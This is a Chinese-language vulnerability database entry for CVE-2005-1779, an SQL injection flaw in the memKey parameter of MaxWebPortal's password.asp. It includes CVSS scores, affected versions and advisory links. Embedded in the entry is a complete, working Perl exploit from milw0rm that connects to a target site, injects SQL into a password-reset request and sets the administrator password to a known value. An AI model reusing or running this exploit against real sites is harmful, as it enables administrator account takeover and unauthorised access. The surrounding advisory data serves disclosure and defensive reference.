CVE-2005-1779
CVSS7.5
发布时间 :2005-05-31 00:00:00
修订时间 :2008-09-05 16:50:04
NMCOE    

[原文]SQL injection vulnerability in password.asp in MaxWebPortal 1.35, 1.36, 2.0, and 20050418 Next allows remote attackers to execute arbitrary SQL commands via the memKey parameter.


[CNNVD]MaxWebPortal 存在SQL注入漏洞(CNNVD-200505-1249)

        MaxWebPortal 1.35、1.36、2.0和20050418 Next 中的password.asp存在SQL注入漏洞,远程攻击者可以通过memKey参数来执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:maxwebportal:maxwebportal:2005-04-18
cpe:/a:maxwebportal:maxwebportal:1.36
cpe:/a:maxwebportal:maxwebportal:2.0
cpe:/a:maxwebportal:maxwebportal:1.35

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1779
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1779
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1249
(官方数据源) CNNVD

- 其它链接及资源

http://securitytracker.com/id?1014048
(VENDOR_ADVISORY)  SECTRACK  1014048
http://secunia.com/advisories/15511
(VENDOR_ADVISORY)  SECUNIA  15511

- 漏洞信息

MaxWebPortal 存在SQL注入漏洞
高危 SQL注入
2005-05-31 00:00:00 2005-10-20 00:00:00
远程  
        MaxWebPortal 1.35、1.36、2.0和20050418 Next 中的password.asp存在SQL注入漏洞,远程攻击者可以通过memKey参数来执行任意SQL命令。

- 公告与补丁

        

- 漏洞信息 (1010)

Maxwebportal <= 1.36 password.asp Change Password Exploit (3 - perl) (EDBID:1010)
asp webapps
2005-05-26 Verified
0 Alpha_Programmer
N/A [点击下载]
#!/usr/bin/perl
#################################################################
#    T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m
#################################################################
# EXPLOIT FOR - MAX Portal (All Versions)
#
#Exploit By :  A l p h a _ P r o g r a m m e r ( Sirus-v );
#E-Mail : Alpha_Programmer@Yahoo.com
#
#This Xpl Change Admin's Pass in This Portal !!
#
#Discovered by: s d <irsdl@yahoo.com>
#
#################################################################
#  Gr33tz To ==>   mh_p0rtal , Oil_karchack , Str0ke   &  AlphaST.Com
#
#And Iranian Hacking & Security Teams :
# IHS , Shabgard , Emperor ,Crouz & Simorgh-ev
#################################################################
use IO::Socket;

if (@ARGV < 2)
{
 print "\n==========================================\n";
 print " \n     -- Exploit By Alpha Programmer --\n\n";
 print "     Trap-Set Underground Hacking Team      \n\n";
 print "      Usage: Max.pl <T4rg3t> <V3rsion>\n\n";
 print " V3rsion :\n";
 print " 1 ==>   Version 1.35 and 0lder\n";
 print " 2 ==>   Version 1.36, 2.0 and Next\n";
 print "==========================================\n\n";
 print "Example:\n\n";
 print "    Max.pl www.Site.com 1\n";
 exit();
}
$hell = "foo' or M_Name='admin";
if ($ARGV[1] =~"2" ){$hell = "foo%27%29+or+M_Name%3D%27admin%27+or+%28%271%27%3D%272"};


my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "C0nn3cted\n";

$http = "POST /password.asp?mode=reset HTTP/1.0";
$http .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
$http .= "Accept-Language: fa\n";
$http .= "Content-Type: application/x-www-form-urlencoded\n";
$http .= "Pragma: no-cache\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n";
$http .= "Content-Length: 111\n";
$http .= "Proxy-Connection: Keep-Alive\n";
$http .= "Cookie: SSOComhide=Name=admin; SSOComUser=Cookies=&Pword=d7fae5da3d785535c12b70865519ba86&Name=admin\n\n";

$http .= "pass=trapset&pass2=trapset&memId=-1&memKey=$hell&Submit=Submit\n\n\n\n";

print "\n";
print $remote $http;
sleep(1);
print "[+] Attacking ...\n";
print "[+] Changing Admin's Password ...\n";
while (<$remote>)
{
}
print "\nNow Go to $host and Login With :\n\n";
print "User: admin\n";
print "Pass: trapset\n\n";
print "Enjoy ;)\n";
print "\n";
### EOF ###

# milw0rm.com [2005-05-26]
		

- 漏洞信息

16847
MaxWebPortal password.asp memKey Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

MaxWebPortal contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to the 'memKey' variable in the 'password.asp' script not being properly sanitized and may allow a remote attacker to inject or manipulate SQL queries.

- 时间线

2005-05-24 Unknow
2005-05-24 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站